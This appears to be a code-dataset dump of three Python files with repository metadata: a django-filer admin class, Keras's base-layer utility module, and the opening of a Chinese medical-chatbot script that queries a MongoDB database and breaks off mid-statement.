9c5ddc8a1327e2e3bf0652b0b73c43c1e5594e36
|
[
"BSD-3-Clause"
] | null | null | null |
filer/admin/fileadmin.py
|
pietzschke/django-filer
|
9c5ddc8a1327e2e3bf0652b0b73c43c1e5594e36
|
[
"BSD-3-Clause"
] | null | null | null |
from django import forms
from django.contrib.admin.utils import unquote
from django.http import HttpResponseRedirect
from django.urls import reverse
from django.utils.safestring import mark_safe
from django.utils.translation import gettext as _
from .. import settings
from ..models import File
from .permissions import PrimitivePermissionAwareModelAdmin
from .tools import AdminContext, admin_url_params_encoded, popup_status
class FileAdminChangeFrom(forms.ModelForm):
class Meta:
model = File
exclude = ()
class FileAdmin(PrimitivePermissionAwareModelAdmin):
list_display = ('label',)
list_per_page = 10
search_fields = ['name', 'original_filename', 'sha1', 'description']
raw_id_fields = ('owner',)
readonly_fields = ('sha1', 'display_canonical')
form = FileAdminChangeFrom
@classmethod
def build_fieldsets(cls, extra_main_fields=(), extra_advanced_fields=(),
extra_fieldsets=()):
fieldsets = (
(None, {
'fields': (
'name',
'owner',
'description',
) + extra_main_fields,
}),
(_('Advanced'), {
'fields': (
'file',
'sha1',
'display_canonical',
) + extra_advanced_fields,
'classes': ('collapse',),
}),
) + extra_fieldsets
if settings.FILER_ENABLE_PERMISSIONS:
fieldsets = fieldsets + (
(None, {
'fields': ('is_public',)
}),
)
return fieldsets
def response_change(self, request, obj):
"""
Overrides the default to be able to forward to the directory listing
instead of the default change_list_view
"""
if (
request.POST
and '_continue' not in request.POST
and '_saveasnew' not in request.POST
and '_addanother' not in request.POST
):
# Popup in pick mode or normal mode. In both cases we want to go
# back to the folder list view after save. And not the useless file
# list view.
if obj.folder:
url = reverse('admin:filer-directory_listing',
kwargs={'folder_id': obj.folder.id})
else:
url = reverse(
'admin:filer-directory_listing-unfiled_images')
url = "{}{}".format(
url,
admin_url_params_encoded(request),
)
return HttpResponseRedirect(url)
return super().response_change(request, obj)
def render_change_form(self, request, context, add=False, change=False,
form_url='', obj=None):
info = self.model._meta.app_label, self.model._meta.model_name
extra_context = {'show_delete': True,
'history_url': 'admin:%s_%s_history' % info,
'is_popup': popup_status(request),
'filer_admin_context': AdminContext(request)}
context.update(extra_context)
return super().render_change_form(
request=request, context=context, add=add, change=change,
form_url=form_url, obj=obj)
def delete_view(self, request, object_id, extra_context=None):
"""
Overrides the default to enable redirecting to the directory view after
deletion of a image.
we need to fetch the object and find out who the parent is
before super, because super will delete the object and make it
impossible to find out the parent folder to redirect to.
"""
try:
obj = self.get_queryset(request).get(pk=unquote(object_id))
parent_folder = obj.folder
except self.model.DoesNotExist:
parent_folder = None
if request.POST:
# Return to folder listing, since there is no usable file listing.
super().delete_view(
request=request, object_id=object_id,
extra_context=extra_context)
if parent_folder:
url = reverse('admin:filer-directory_listing',
kwargs={'folder_id': parent_folder.id})
else:
url = reverse('admin:filer-directory_listing-unfiled_images')
url = "{}{}".format(
url,
admin_url_params_encoded(request)
)
return HttpResponseRedirect(url)
return super().delete_view(
request=request, object_id=object_id,
extra_context=extra_context)
def get_model_perms(self, request):
"""
It seems this is only used for the list view. NICE :-)
"""
return {
'add': False,
'change': False,
'delete': False,
}
def display_canonical(self, instance):
canonical = instance.canonical_url
if canonical:
return mark_safe(f'<a href="{canonical}">{canonical}</a>')
else:
return '-'
display_canonical.allow_tags = True
display_canonical.short_description = _('canonical URL')
FileAdmin.fieldsets = FileAdmin.build_fieldsets()
| 35.407895
| 79
| 0.567633
|
e10c07eaffe4fe488bb8bf70855dd6181771ad2f
| 32,910
|
py
|
Python
|
venv/lib/python3.8/site-packages/keras/engine/base_layer_utils.py
|
JIANG-CX/data_labeling
|
8d2470bbb537dfc09ed2f7027ed8ee7de6447248
|
[
"MIT"
] | 1
|
2021-05-24T10:08:51.000Z
|
2021-05-24T10:08:51.000Z
|
venv/lib/python3.8/site-packages/keras/engine/base_layer_utils.py
|
JIANG-CX/data_labeling
|
8d2470bbb537dfc09ed2f7027ed8ee7de6447248
|
[
"MIT"
] | null | null | null |
venv/lib/python3.8/site-packages/keras/engine/base_layer_utils.py
|
JIANG-CX/data_labeling
|
8d2470bbb537dfc09ed2f7027ed8ee7de6447248
|
[
"MIT"
] | null | null | null |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains private utilities used mainly by the base Layer class."""
import tensorflow.compat.v2 as tf
import functools
import threading
from keras import backend
from keras.utils import control_flow_util
from keras.utils import tf_inspect
from keras.utils import tf_utils
from tensorflow.python.util import keras_deps
from tensorflow.python.util.tf_export import keras_export
_call_context = threading.local()
def create_mean_metric(value, name=None):
# import keras will import base_layer and then this module, and metric relies
# on base_layer, which result into a cyclic dependency.
from keras import metrics as metrics_module # pylint: disable=g-import-not-at-top
metric_obj = metrics_module.Mean(name=name, dtype=value.dtype)
return metric_obj, metric_obj(value)
def make_variable(name,
shape=None,
dtype=tf.float32,
initializer=None,
trainable=None,
caching_device=None,
validate_shape=True,
constraint=None,
use_resource=None,
collections=None,
synchronization=tf.VariableSynchronization.AUTO,
aggregation=tf.compat.v1.VariableAggregation.NONE,
partitioner=None): # pylint: disable=unused-argument
"""Temporary util to create a variable (relies on `variable_scope.variable`).
Some reuse-related technicalities prevent us from using
`variable_scope.get_variable()` directly, so we use a subcomponent
that has fewer constraints (`variable_scope.variable()`).
In the longer term, it seems like a similar "default variable creator" method
should exist in `Trackable` instead. When this happens, we can get
rid of this temporary solution.
TODO(fchollet): remove this method when no longer needed.
Args:
name: Variable name.
shape: Variable shape.
dtype: The type of the variable. Defaults to `self.dtype` or `float32`.
initializer: Initializer instance (callable).
trainable: Whether the variable should be part of the layer's
"trainable_variables" (e.g. variables, biases)
or "non_trainable_variables" (e.g. BatchNorm mean, stddev).
Note, if the current variable scope is marked as non-trainable
then this parameter is ignored and any added variables are also
marked as non-trainable. `trainable` defaults to `True` unless
`synchronization` is set to `ON_READ`.
caching_device: Passed to `tf.Variable`.
validate_shape: Passed to `tf.Variable`.
constraint: Constraint instance (callable).
use_resource: Whether to use a `ResourceVariable`.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
partitioner: Not handled at this time.
Returns:
Variable instance.
"""
initializing_from_value = False
if initializer is not None and not callable(initializer):
initializing_from_value = True
if initializing_from_value:
init_val = initializer
variable_dtype = None
else:
# Instantiate initializer if provided initializer is a type object.
if tf_inspect.isclass(initializer):
initializer = initializer()
init_val = functools.partial(initializer, shape, dtype=dtype)
variable_dtype = dtype.base_dtype
if use_resource is None:
use_resource = True
# TODO(apassos,rohanj) figure out how to remove collections from here so we
# can remove the V1.
variable_shape = tf.TensorShape(shape)
return tf.compat.v1.Variable(
initial_value=init_val,
name=name,
trainable=trainable,
caching_device=caching_device,
dtype=variable_dtype,
validate_shape=validate_shape,
constraint=constraint,
use_resource=use_resource,
collections=collections,
synchronization=synchronization,
aggregation=aggregation,
shape=variable_shape if variable_shape else None)
def collect_previous_mask(input_tensors):
"""Retrieves the output mask(s) of the previous node.
Args:
input_tensors: An arbitrary structure of Tensors.
Returns:
A mask tensor or list of mask tensors.
"""
def _collect_previous_mask(x):
return getattr(x, '_keras_mask', None)
return tf.nest.map_structure(_collect_previous_mask, input_tensors)
def have_all_keras_metadata(tensors):
return all(hasattr(x, '_keras_history') for x in tf.nest.flatten(tensors))
def generate_placeholders_from_shape(shape):
return tf.compat.v1.placeholder(shape=shape, dtype=backend.floatx())
def create_keras_history(tensors):
"""Wraps TensorFlow Operations for compatibility with the Functional API.
This method checks to see if a Tensor in `tensors` is missing Keras metadata
and has its origin in a Keras `Input` Layer. If so, this method will replace
the raw TensorFlow Operations that created this tensor with
`TensorFlowOpLayer` instances that create identical operations.
Any Tensors not originating from a Keras `Input` Layer will be treated as
constants when constructing `TensorFlowOpLayer` instances.
Args:
tensors: A structure of Tensors, some of which come from raw TensorFlow
operations and need to have Keras metadata assigned to them.
Returns:
created_layers: List. The `TensorFlowOpLayer` instances created to wrap
the raw Tensorflow operations.
"""
_, created_layers = _create_keras_history_helper(tensors, set(), [])
return created_layers
# Unsafe Internal attribute.
# If True, Keras will not evaluate the constant-foldable inputs to tf op
# layers in TF1 graphs. This *might* speed up model construction time in
# certain settings, but it means
# the models will not be serializable/deserializable via get_config
# (Only via Savedmodels). It may also change the semantics of whether
# generated random numbers are generated once and re-used, or recomputed
# each time.
# Note: This path triggers for TPUEstimators / xla compiled graphs regardless
# of this setting.
_UNSAFE_GRAPH_OP_LAYER_CREATION = False
def _create_keras_history_helper(tensors, processed_ops, created_layers):
"""Helper method for `create_keras_history`.
Args:
tensors: A structure of Tensors for which to create Keras metadata.
processed_ops: Set. TensorFlow operations that have already been wrapped in
`TensorFlowOpLayer` instances.
created_layers: List. The `TensorFlowOpLayer` instances created.
Returns:
Tuple. First element is the updated set of TensorFlow Operations that
have been wrapped in `TensorFlowOpLayer` instances. Second element is
a list of the `TensorFlowOpLayer` instances created.
"""
if tf.compat.v1.executing_eagerly_outside_functions():
raise ValueError(
'`create_keras_history` should only be called if eager is disabled!')
# Import of `base_layer` needed in order to create `TensorFlowOpLayer`.
# Cannot be imported at top because of circular dependencies.
# TODO(omalleyt): Resolve circular dependency.
from keras.engine import base_layer # pylint: disable=g-import-not-at-top
tensor_list = tf.nest.flatten(tensors)
sparse_ops = []
ragged_tensors = []
for tensor in tensor_list:
if getattr(tensor, '_keras_history', None) is not None:
continue
if isinstance(
tensor, (tf.SparseTensor, tf.compat.v1.SparseTensorValue)):
sparse_ops.append(tensor.op)
continue
if tf_utils.is_ragged(tensor):
# Ragged tensors don't have an op property
ragged_tensors.append(tensor)
continue
op = tensor.op # The Op that created this Tensor.
if op not in processed_ops:
# Recursively set `_keras_history`.
op_inputs = list(op.inputs)
constants = {}
layer_inputs = []
for i, op_input in enumerate(op_inputs):
if uses_keras_history(op_input):
layer_inputs.append(op_input)
else:
# Treat any value not originating from a `keras.Input` as
# a constant. Variables cannot be supported.
ds_with_session = (
tf.distribute.in_cross_replica_context() and
not tf.compat.v1.executing_eagerly_outside_functions())
using_xla = control_flow_util.GraphOrParentsInXlaContext(
tf.compat.v1.get_default_graph())
if ds_with_session or using_xla or _UNSAFE_GRAPH_OP_LAYER_CREATION:
# In Legacy Graph mode, evaluating here makes Session be
# configured improperly. The downside of this is that saving
# via `get_config` breaks, but SavedModel still works.
constants[i] = op_input
else:
with tf.init_scope():
constants[i] = backend.function([], op_input)([])
layer_inputs = unnest_if_single_tensor(layer_inputs)
processed_ops, created_layers = _create_keras_history_helper(
layer_inputs, processed_ops, created_layers)
name = op.name
node_def = op.node_def.SerializeToString()
op_layer = base_layer.TensorFlowOpLayer(
node_def, constants=constants, name=name)
created_layers.append(op_layer)
op_layer._set_connectivity_metadata( # pylint: disable=protected-access
args=(layer_inputs,),
kwargs={},
outputs=op.outputs)
processed_ops.update([op])
if sparse_ops or ragged_tensors:
lambda_example = """
weights_mult = lambda x: tf.sparse.sparse_dense_matmul(x, weights)
output = tf.keras.layers.Lambda(weights_mult)(input)
"""
raise ValueError(
'Tensorflow ops that generate ragged or sparse tensor '
'outputs are currently not supported by Keras automatic '
'op wrapping. Please wrap these ops in a Lambda layer: '
'\n\n```\n{example}\n```\n'
'Sparse ops encountered: {sparse_ops}\n'
'Ragged tensors encountered: {ragged_tensors}\n'.format(
example=lambda_example,
sparse_ops=str(sparse_ops),
ragged_tensors=str(ragged_tensors)))
return processed_ops, created_layers
def unnest_if_single_tensor(input_tensors):
# Preserve compatibility with older configs
flat_input_tensors = tf.nest.flatten(input_tensors)
# If this is a single element but not a dict, unwrap. If this is a dict,
# assume the first layer expects a dict (as is the case with a
# DenseFeatures layer); pass through.
if not isinstance(input_tensors, dict) and len(flat_input_tensors) == 1:
input_tensors = flat_input_tensors[0]
return input_tensors
def needs_keras_history(tensors, ignore_call_context=False):
"""Check if any Tensors need to be wrapped in TensorFlowOpLayers.
This will never return True inside a sublayer, because sublayers
do not need to create Keras History. Otherwise, this returns True
if one or more of `tensors` originates from a `keras.Input` and
does not have `_keras_history` set.
Args:
tensors: An arbitrary nested structure of Tensors.
ignore_call_context: Whether to ignore the check of if currently
outside of a `call` context. This is `True` when creating
KerasHistory inside `Node`, where we always know that Tensors
are being used with the Functional API.
Returns:
Bool, whether at least one Tensor needs to be wrapped.
"""
input_tensors = tf.nest.flatten(tensors)
if call_context().in_call and not ignore_call_context:
return False
if all(
getattr(tensor, '_keras_history', None) is not None
for tensor in input_tensors):
# KerasHistory already set.
return False
return uses_keras_history(tensors)
def is_in_keras_graph():
"""Returns if currently executing inside of a Keras graph."""
return call_context().in_keras_graph
def is_in_eager_or_tf_function():
"""Returns if in eager mode or inside of a tf.function."""
return tf.executing_eagerly() or is_in_tf_function()
def is_in_tf_function():
"""Returns if inside of a tf.function."""
# Check if running in V1 graph mode.
if not tf.compat.v1.executing_eagerly_outside_functions():
return False
if not tf.inside_function():
return False
# Check if inside Keras FuncGraph.
if is_in_keras_graph():
return False
# Check for a v1 `wrap_function` FuncGraph.
graph = tf.compat.v1.get_default_graph()
if (getattr(graph, 'name', False) and
graph.name.startswith('wrapped_function')):
return False
return True
def uses_keras_history(tensors):
"""Check if at least one Tensor originates from a `keras.Input`.
This is `True` if at least one Tensor has its origin in a `keras.Input`.
Any Tensor that originates from a `keras.Input` will have a dependency
Tensor with a `_keras_history` attribute attached. Tensors that have
already been checked to not originate from a `keras.Input`
are marked as `_keras_history_checked`.
Args:
tensors: An arbitrary nested structure of Tensors.
Returns:
Bool, whether at least one Tensor originates from a `keras.Input`.
"""
checked_tensors = set()
tensors_to_check = tf.nest.flatten(tensors)
while tensors_to_check:
new_tensors_to_check = []
for tensor in tensors_to_check:
if id(tensor) in checked_tensors:
continue
checked_tensors.add(id(tensor))
if getattr(tensor, '_keras_history_checked', None) is not None:
continue
if getattr(tensor, '_keras_history', None) is not None:
return True
try:
new_tensors_to_check.extend(tensor.op.inputs)
except AttributeError:
# In case `tensor` is a Variable created in an Eager context.
pass
tensors_to_check = new_tensors_to_check
# Mark that these Tensors have been checked once for `_keras_history`,
# and should not be checked again for performance reasons.
mark_checked(tensors)
return False
def mark_checked(tensors):
"""Marks that these Tensors should not be tracked.
This prevents Layers from attempting to create TensorFlowOpLayers
for these Tensors.
Args:
tensors: An arbitrary structure of Tensors.
"""
def _mark_checked(tensor):
tensor._keras_history_checked = True # pylint: disable=protected-access
tf.nest.map_structure(_mark_checked, tensors)
def call_context():
"""Returns currently active `CallContext`."""
call_ctx = getattr(_call_context, 'call_context', None)
if call_ctx is None:
call_ctx = CallContext()
_call_context.call_context = call_ctx
return call_ctx
# Inject the call_context function to keras_deps to remove the dependency
# from TFLite to Keras.
keras_deps.register_call_context_function(call_context)
class CallContext(object):
"""Keeps track of properties currently inside a Layer/Model's `call`.
Attributes:
in_call: Whether currently inside the `call` of a Layer.
layer: The `Layer` whose `call` is currently active.
inputs: The inputs to the currently active `Layer`.
build_graph: Whether currently inside a Graph or FuncGraph.
training: Whether currently executing in training or inference mode.
saving: Whether currently saving to SavedModel.
frozen: Whether currently executing inside a `Layer` with `trainable` set to
`False`.
in_keras_graph: Whether executing inside the Keras Graph.
"""
def __init__(self):
# Handle `in_call` separately as it is the most-read attr and reading it is
# on the hot path.
self.in_call = False
self._state = {
'layer': None,
'inputs': None,
'build_graph': False,
'training': None,
'saving': None
}
# TODO(b/150169018): This logic can be replaced after the Functional API
# refactor.
self._in_keras_graph = False
def enter(self, layer, inputs, build_graph, training, saving=None):
"""Push a Layer and its inputs and state onto the current call context.
Args:
layer: The `Layer` whose `call` is currently active.
inputs: The inputs to the currently active `Layer`.
build_graph: Whether currently inside a Graph or FuncGraph.
training: Whether currently executing in training or inference mode.
saving: Whether currently saving to SavedModel.
Returns:
Context manager.
"""
state = {
'layer': layer,
'inputs': inputs,
'build_graph': build_graph,
'training': training,
'saving': saving
}
return CallContextManager(self, state)
@property
def layer(self):
return self._state['layer']
@property
def inputs(self):
return self._state['inputs']
@property
def build_graph(self):
return self._state['build_graph']
@property
def training(self):
return self._state['training']
@property
def saving(self):
return self._state['saving']
@property
def frozen(self):
layer = self._state['layer']
if not layer:
return False
return not layer.trainable
@property
def in_keras_graph(self):
# Returns True even if in a subgraph of the Keras graph, such as those
# created by control flow ops.
if tf.executing_eagerly():
return False
return (self._in_keras_graph or
getattr(backend.get_graph(), 'name', None) == 'keras_graph')
class CallContextManager(object):
"""Context manager for `CallContext`."""
def __init__(self, call_ctx, state):
self._call_ctx = call_ctx
self._state = state
self._build_graph = state['build_graph']
def __enter__(self):
call_ctx = self._call_ctx
self._prev_in_call = call_ctx.in_call
self._prev_state = call_ctx._state
call_ctx.in_call = True
call_ctx._state = self._state
# TODO(b/150169018): This logic can be removed after the Functional API
# refactor.
if self._build_graph:
self._prev_in_keras_graph = call_ctx._in_keras_graph
call_ctx._in_keras_graph = (
call_ctx._in_keras_graph or
getattr(backend.get_graph(), 'name', None) == 'keras_graph')
def __exit__(self, *exc_info):
call_ctx = self._call_ctx
call_ctx.in_call = self._prev_in_call
call_ctx._state = self._prev_state
if self._build_graph:
call_ctx._in_keras_graph = self._prev_in_keras_graph
def training_arg_passed_to_call(argspec, args, kwargs):
"""Returns whether a user passed the `training` argument in `__call__`."""
# `argspec.args` starts with ['self', 'inputs']
full_args = dict(zip(argspec.args[2:], args))
full_args.update(kwargs)
return 'training' in full_args and full_args['training'] is not None
def is_subclassed(layer):
"""Returns True if the object is a subclassed layer or subclassed model."""
return (layer.__module__.find('keras.engine') == -1 and
layer.__module__.find('keras.layers') == -1)
def from_saved_model(layer):
"""Returns whether the layer is loaded from a SavedModel."""
return layer.__module__.find('keras.saving.saved_model') != -1
def check_graph_consistency(tensor=None, method='add_loss', force_raise=False):
"""Checks that tensors passed to `add_*` method match the Keras graph.
When one of the `add_*` method is called inside a V2 conditional branch,
the underlying tensor gets created in a FuncGraph managed by control_flow_v2.
We need to raise clear error messages in such cases.
Args:
tensor: Tensor to check, or `False` if it is known that an error
should be raised.
method: Caller method, one of {'add_metric', 'add_loss', 'add_update'}.
force_raise: If an error should be raised regardless of `tensor`.
Raises:
RuntimeError: In case of an out-of-graph tensor.
"""
if (force_raise or
(tf.compat.v1.executing_eagerly_outside_functions() and
hasattr(tensor, 'graph') and tensor.graph.is_control_flow_graph)):
if method == 'activity_regularizer':
bad_example = """
class TestModel(tf.keras.Model):
def __init__(self):
super(TestModel, self).__init__(name='test_model')
self.dense = tf.keras.layers.Dense(2, activity_regularizer='l2')
def call(self, x, training=None):
if training:
return self.dense(x)
else:
return self.dense(x)
"""
correct_example = """
class TestModel(tf.keras.Model):
def __init__(self):
super(TestModel, self).__init__(name='test_model')
self.dense = tf.keras.layers.Dense(2, activity_regularizer='l2')
def call(self, x, training=None):
return self.dense(x)
"""
raise RuntimeError(
'You are using a layer with `activity_regularizer` in a control flow '
'branch, e.g.:\n{bad_example}\nThis is currently not supported. '
'Please move your call to the layer with `activity_regularizer` out '
'of the control flow branch, e.g.:\n{correct_example}\n'
'You can also resolve this by marking your outer model/layer dynamic'
' (eager-only) by passing `dynamic=True` to the layer constructor. '
'Any kind of control flow is supported with dynamic layers. '
'Note that using `dynamic=True` requires you to implement static '
'shape inference in the `compute_output_shape(input_shape)` '
'method.'.format(
bad_example=bad_example, correct_example=correct_example))
if method == 'add_metric':
bad_example = """
def call(self, inputs, training=None):
if training:
metric = compute_metric(inputs)
self.add_metric(metric, name='my_metric', aggregation='mean')
return inputs
"""
correct_example = """
def call(self, inputs, training=None):
if training:
metric = compute_metric(inputs)
else:
metric = 0.
self.add_metric(metric, name='my_metric', aggregation='mean')
return inputs
"""
elif method == 'add_loss':
bad_example = """
def call(self, inputs, training=None):
if training:
loss = compute_loss(inputs)
self.add_loss(loss)
return inputs
"""
correct_example = """
def call(self, inputs, training=None):
if training:
loss = compute_loss(inputs)
else:
loss = 0.
self.add_loss(loss)
return inputs
"""
else:
bad_example = """
def call(self, inputs, training=None):
if training:
self.add_update(self.w.assign_add(1))
return inputs
"""
correct_example = """
def call(self, inputs, training=None):
if training:
increment = 1
else:
increment = 0
self.add_update(self.w.assign_add(increment))
return inputs
"""
raise RuntimeError(
'You are using the method `{method}` in a control flow branch '
'in your layer, e.g.:\n{bad_example}\n'
'This is not currently supported. '
'Please move your call to {method} out of the control flow branch, '
'e.g.:\n{correct_example}\n'
'You can also resolve this by marking your layer '
'as dynamic (eager-only) by passing '
'`dynamic=True` to the layer constructor. '
'Any kind of control flow is supported with dynamic layers. '
'Note that using `dynamic=True` requires you '
'to implement static shape inference '
'in the `compute_output_shape(input_shape)` method.'.format(
method=method,
bad_example=bad_example,
correct_example=correct_example))
def mark_as_return(outputs, acd):
"""Marks `outputs` as the return values for automatic control deps."""
def _mark_as_return(tensor):
"""Marks `tensor` as the return value for automatic control deps."""
if not tf.is_tensor(tensor):
return tensor
# pylint: disable=protected-access
return_tensor = acd.mark_as_return(tensor)
if getattr(tensor, '_keras_mask', None) is not None:
return_tensor._keras_mask = acd.mark_as_return(tensor._keras_mask)
else:
return_tensor._keras_mask = None
# Handle TensorFlow Probability attached metadata.
# TODO(b/132076537): Remove this once TFP uses `CompositeTensor`.
if getattr(tensor, '_tfp_distribution', None) is not None:
return_tensor._tfp_distribution = tensor._tfp_distribution
return return_tensor
# pylint: enable=protected-access
return tf.nest.map_structure(_mark_as_return, outputs)
V2_DTYPE_BEHAVIOR = None
@keras_export(v1=['keras.layers.enable_v2_dtype_behavior'])
def enable_v2_dtype_behavior():
"""Enable the V2 dtype behavior for Keras layers.
By default, the V2 dtype behavior is enabled in TensorFlow 2, so this function
is only useful if `tf.compat.v1.disable_v2_behavior` has been called. Since
mixed precision requires V2 dtype behavior to be enabled, this function allows
you to use mixed precision in Keras layers if `disable_v2_behavior` has been
called.
When enabled, the dtype of Keras layers defaults to floatx (which is typically
float32) instead of None. In addition, layers will automatically cast
floating-point inputs to the layer's dtype.
>>> x = tf.ones((4, 4, 4, 4), dtype='float64')
>>> layer = tf.keras.layers.Conv2D(filters=4, kernel_size=2)
>>> print(layer.dtype) # float32 since V2 dtype behavior is enabled
float32
>>> y = layer(x) # Layer casts inputs since V2 dtype behavior is enabled
>>> print(y.dtype.name)
float32
A layer author can opt-out their layer from the automatic input casting by
passing `autocast=False` to the base Layer's constructor. This disables the
autocasting part of the V2 behavior for that layer, but not the defaulting to
floatx part of the V2 behavior.
When a global `tf.keras.mixed_precision.Policy` is set, a Keras layer's dtype
will default to the global policy instead of floatx. Layers will automatically
cast inputs to the policy's compute_dtype.
"""
global V2_DTYPE_BEHAVIOR
V2_DTYPE_BEHAVIOR = True
@keras_export(v1=['keras.layers.disable_v2_dtype_behavior'])
def disable_v2_dtype_behavior():
"""Disables the V2 dtype behavior for Keras layers.
See `tf.compat.v1.keras.layers.enable_v2_dtype_behavior`.
"""
global V2_DTYPE_BEHAVIOR
V2_DTYPE_BEHAVIOR = False
def v2_dtype_behavior_enabled():
"""Returns True if the V2 dtype behavior is enabled."""
if V2_DTYPE_BEHAVIOR is None:
return tf.__internal__.tf2.enabled()
return V2_DTYPE_BEHAVIOR
class TrackableWeightHandler(object):
"""Keras wrapper for handling tracking.Trackable object saving and restoring.
This class handles Trackables in both V1 and V2 modes, ensuring that they can
be saved and restored with the correct data and without adding additional ops
on every save.
Attributes:
trackable: The trackable to wrap.
num_tensors: The number of tensors that this trackable requires for saving.
"""
def __init__(self, trackable):
if not isinstance(trackable, tf.__internal__.tracking.Trackable):
raise ValueError('%s is not a Trackable object.' % (trackable,))
self._trackable = trackable
self._distribute_strategy = tf.distribute.get_strategy()
# TODO(b/141682913): Figure out why this is private and fix it.
saveables = trackable._gather_saveables_for_checkpoint().values() # pylint: disable=protected-access
# 'Saveables' won't exist when we're passed a legacy TF1 table like
# a StaticHashTable.
if not saveables:
self._num_tensors = 0
self._setter = lambda weights: None
self._getter = lambda: []
elif len(saveables) == 1:
saveable = list(saveables)[0]
if tf.compat.v1.executing_eagerly_outside_functions():
# If we're in eager mode, we need to defer calling the Trackable's
# saveable() callable until data export time.
# However, it is safe to call the saveable as many times as we want, so
# we will call it now to figure out how many tensors this Trackable will
# produce.
self._saveable = saveable
self._num_tensors = len(self._saveable().specs)
self._setter = lambda weights: self._saveable().restore(weights, None)
self._getter = lambda: [spec.tensor for spec in self._saveable().specs]
else:
# If we're in Graph mode, we need to evaluate the Saveable only once and
# cache the resulting restore graph. Failing to do this will result in
# new assignment ops being added to the graph each time set_weights() is
# called.
self._placeholder_tensors = []
self._saveable = saveable()
self._num_tensors = len(self._saveable.specs)
for spec in self._saveable.specs:
tensor = spec.tensor
self._placeholder_tensors.append(
tf.compat.v1.placeholder(tensor.dtype, tensor.shape))
self._assign_op = self._saveable.restore(self._placeholder_tensors,
None)
self._setter = self._set_weights_v1
self._getter = lambda: [spec.tensor for spec in self._saveable.specs]
else:
raise ValueError('Only Trackables with one Saveable are supported. '
'The Trackable %s has %d Saveables.' %
(trackable, len(saveables)))
@property
def num_tensors(self):
return self._num_tensors
def set_weights(self, weights):
if len(weights) != self._num_tensors:
raise ValueError(
('Weight handler for trackable %s received the wrong number of ' +
'weights: expected %s, got %s.') %
(self._trackable, self._num_tensors, len(weights)))
self._setter(weights)
def get_tensors(self):
return self._getter()
def _set_weights_v1(self, weights):
feed_dict = {}
for idx, tensor in enumerate(weights):
feed_dict[self._placeholder_tensors[idx]] = tensor
backend.get_session().run(self._assign_op, feed_dict)
class StaticTableHandler(TrackableWeightHandler):
"""Wrapper for handling weight collection for static hash tables."""
def __init__(self, getter_lambda): # pylint: disable=super-init-not-called
self._num_tensors = 2
self._getter = getter_lambda
self._distribute_strategy = tf.distribute.get_strategy()
def raise_error(_):
raise RuntimeError('This layer contains a static lookup table, which '
'cannot be changed via set_weights().')
self._setter = raise_error
def no_ragged_support(inputs, layer_name):
input_list = tf.nest.flatten(inputs)
if any(isinstance(x, tf.RaggedTensor) for x in input_list):
raise ValueError('Layer %s does not support RaggedTensors as input. '
'Inputs received: %s. You can try converting your '
'input to an uniform tensor.' % (layer_name, inputs))
def is_split_variable(v):
"""Returns True if `v` is either a PartionedVariable or a ShardedVariable."""
return hasattr(v, '_variable_list') or hasattr(v, '_variables')
def has_weights(obj):
obj_type = type(obj)
return (hasattr(obj_type, 'trainable_weights') and
hasattr(obj_type, 'non_trainable_weights') and
not isinstance(obj, type))
# TODO(kathywu): This is a temporary hack. When a network of layers is revived
# from SavedModel, only the top-level layer will have losses. This causes issues
# in eager mode because the child layers may have graph losses
# (thus model.losses returns a mix of Eager and graph tensors). To fix this,
# whenever eager losses are added to one layer, add eager losses to all
# child layers. This causes `.losses` to only return eager losses.
REVIVED_LOSS_PLACEHOLDER = (
'This layer\'s losses have been added to the parent layer.')
| 36.729911
| 105
| 0.697296
|
c1a342bc87971651e3ac62943b8aaa992f45dbbe
| 2,870
|
py
|
Python
|
brain/brain_libs/LU_model/Doctorbot.py
|
zuxfoucault/DoctorBot_demo
|
82e24078da4d2e6caba728b959812401109e014d
|
[
"MIT"
] | 1
|
2020-09-24T07:26:14.000Z
|
2020-09-24T07:26:14.000Z
|
brain/brain_libs/LU_model/Doctorbot.py
|
lintzuhsiang/Doctorbot
|
6be98bbf380d14bb789d30a137ded3b51b3f31fd
|
[
"MIT"
] | null | null | null |
brain/brain_libs/LU_model/Doctorbot.py
|
lintzuhsiang/Doctorbot
|
6be98bbf380d14bb789d30a137ded3b51b3f31fd
|
[
"MIT"
] | null | null | null |
import db
import LU
import sys
DB_IP = "104.199.131.158" # doctorbot GCP ip
DB_PORT = 27017 # default MongoDB port
DB_NAME = "doctorbot" # use the collection
def main():
client = db.MongoClient(DB_IP, DB_PORT)
collection_division = client[DB_NAME]["division"]
collection_disease = client[DB_NAME]["disease"]
sys.stdout.flush()
print("您好,我是Seek Doctor Bot,如果您想要\n" +
"1.查詢某疾病相關症狀,您可以問我:請問青光眼會怎樣\n" +
"2.知道某疾病屬於什麼科別,您可以問我:青光眼是哪科\n" +
"3.查詢某疾病或科別主治醫師,您可以問我:青光眼要看哪些醫生\n" +
"4.查詢某疾病,科別或醫生的門診時間,您可以說:給我青光眼門診時刻表\n" +
"5.預約掛號某疾病,科別或醫生的門診,您可以說:我要掛號眼科"
)
while True:
sentence = input('\n\n請輸入: ')
slot_dictionary = LU.SlotFilling().decode(sentence)
print("[ Slot ]")
for slot, value in slot_dictionary.items():
print(slot, ": ", value)
intent = LU.IntentPredict().get_intent(sentence)
intent_index = intent.index(max(intent))
intents = ['greeting', 'search_symptom', 'search_division', 'search_doctor', 'search_timetable', 'register']
print('[ Intent ] ' + intents[intent_index])
print('\n\n')
if intent_index == 1: # search_symptom
print("好的,您想查詢" +
slot_dictionary['disease'] +
"會有什麼症狀,以下為相關可能症狀:")
for data in collection_disease.find({"disease_c": {"$regex": slot_dictionary['disease']}}):
print(", ".join(data['symptom']))
elif intent_index == 2: # search_division
print("好的,您想查詢" +
